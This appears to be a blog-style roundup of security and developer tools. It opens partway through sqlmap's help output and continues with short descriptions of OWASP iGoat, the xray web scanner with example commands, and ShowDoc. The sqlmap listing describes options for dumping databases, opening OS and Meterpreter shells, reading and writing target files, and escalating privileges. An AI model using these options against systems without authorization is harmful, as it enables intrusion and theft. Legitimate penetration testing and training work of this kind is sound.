    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Check for DBMS comments during enumeration
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDE          DBMS database identifier(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)
  Brute force:
    These options can be used to run brute force checks
    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns
  User-defined function injection:
    These options can be used to create custom user-defined functions
    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library
  File system access:
    These options can be used to access the back-end database management
    system underlying file system
    --file-read=FILE..  Read a file from the back-end DBMS file system
    --file-write=FIL..  Write a local file on the back-end DBMS file system
    --file-dest=FILE..  Back-end DBMS absolute filepath to write to
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory
  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type
  General:
    These options can be used to set some general working parameters
    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behavior
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use hex conversion during data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --preprocess=PRE..  Use given script(s) for preprocessing of response data
    --repair            Redump entries having unknown character marker (?)
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap
  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set predefined answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (optional) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS protection
    --list-tampers      Display list of available tamper scripts
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge             Safely remove all content from sqlmap data directory
    --skip-waf          Skip heuristic detection of WAF/IPS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

More can be found here: https://github.com/sqlmapproject/sqlmap/wiki/Usage

http://sqlmap.org/

https://github.com/sqlmapproject/sqlmap/


iGoat – A Learning Tool for iOS App Pentesting and Security (Open Web Application Security Project – OWASP)

iGoat is a learning tool for iOS developers (iPhone, iPad, etc.) and mobile app pentesters. It was inspired by the WebGoat project, and has a similar conceptual flow to it.

As such, iGoat is a safe environment where iOS developers can learn about the major security pitfalls they face as well as how to avoid them. It is made up of a series of lessons that each teach a single (but vital) security lesson.

The lessons are laid out in the following steps:

  1. Brief introduction to the problem.
  2. Verify the problem by exploiting it.
  3. Brief description of available remediations to the problem.
  4. Fix the problem by correcting and rebuilding the iGoat program.

Step 4 is optional, but highly recommended for all iOS developers. Assistance is available within iGoat if you don’t know how to fix a specific problem.

Vulnerabities Covered (version 3.0):

  • Key Management
    • Hardcoded Encryption Keys
    • Key Storage Server Side
    • Random Key Generation
  • URL Scheme Attack
  • Social Engineering
  • Reverse Engineering
    • String Analysis
  • Data Protection (Rest)
    • Local Data Storage (SQLite)
    • Plist Storage
    • Keychain Usage
    • NSUserDefaults Storage
  • Data Protection (Transit)
    • Server Communication
    • Public Key Pinning
  • Authentication
    • Remote Authentication
  • Side Channel Data Leaks
    • Device Logs
    • Cut-and-Paste
    • Backgrounding
    • Keystroke Logging
  • Tampering
    • Method Swizzling
  • Injection Flaws
    • SQL Injection
    • Cross Site Scripting
  • Broken Cryptography

More on: https://github.com/owasp/igoat


Another Web/Web Vulnerability Scanner – xray

A powerful security assessment tool

Supports Active and Passive scanning.

Supports Linux, Windows, macOS

Demo
Demo

1 Use basic crawler to scan a website

xray webscan --basic-crawler http://example.com --html-output crawler.html

2 Run as a HTTP proxy to scan passively

xray webscan --listen 127.0.0.1:7777 --html-output proxy.html

Configure the browser to use http proxy http://127.0.0.1:7777, then the proxy traffic can be automatically analyzed and scanned.

3 Scan a single url

xray webscan --url http://example.com/?a=b --html-output single-url.html

4 Specify the plugins to run manually

By default, all built-in plugins are enabled, and the following commands can be used to enable specific plugins for this scan.

xray webscan --plugins cmd_injection,sqldet --url http://example.com
xray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777 

5 Specify plugin output path

You can specify the output path of the vulnerability information:

xray webscan --url http://example.com/?a=b \ --text-output result.txt --json-output result.json --html-output report.html

6 proxy https traffic

6.1 Download xray binary

6.2 Generate certificate and configuration file

xray genca

6.3 Install the certificate

6.4 We can configure the browser to use proxy server “127.0.0.1:8080” then execute following command

xray webscan --listen 127.0.0.1:8080 --html-output results.htm

Resource


Open source Online Document Management System for Developers – ShowDoc

ShowDoc is a tool greatly applicable for an IT team to share documents online. It can promote communication efficiency among members of the team.

What can it be used for?

  • API Document ( Demo

With the development of mobile Internet, BaaS (Backend as a Service) becomes more and more popular. The Server end provides API, and the APP end or Webpage frontend can invoke data conveniently. Using ShowDoc can compile exquisite API documents in a very fast and convenient way.

  • Data Dictionary ( Demo

A good Data Dictionary can easily exhibit database structure to other people, such as definition of each field and the like.

  • Explanation Document ( Demo

You can absolutely use ShowDoc to compile the explanation documents for some tools, as well as to compile some technical specifications explanation documents for the team to look up.

What functions does it have?

  • Sharing and Exporting

Responsive webpage design can share the project documents to computer or mobile devices for reading. It can also export the project into word document for browsing offline.

  • Permission Management
  • Public Project and Private ProjectProjects on ShowDoc are divided into two categories including Public Project and Private Project. Public Project can be visited by any user no matter he/she logs in or not, while inputting password for verification is needed for visiting the Private Project. The password is set by project creator.
  • Project Transfer

The project creator can transfer the project to other users of the website freely.

  • Project Members

You can easily add or delete project members in the project of ShowDoc. Members of the project can edit the project, but they can not transfer or delete the project (only creator of the project has the permission).

  • Edit Function
    • Markdown Edit
    ShowDoc adopts Markdown Editor, and it is excellent both in editing and reading experience. If you know nothing about Markdown, please search “Learning and Introduction of Markdown” on the search engine.
    • Template Insert
    On the editing page of ShowDoc, a click on the button which is on the top of the Editor can easily insert API interface template and data dictionary template. After inserting the template, altering data is the only thing that need to do and it reduces a lot of work in editing.
    • History Version
    ShowDoc provides a function of History Version on the page, and you can easily restore the page to the former version.

Resource

https://github.com/star7th/showdoc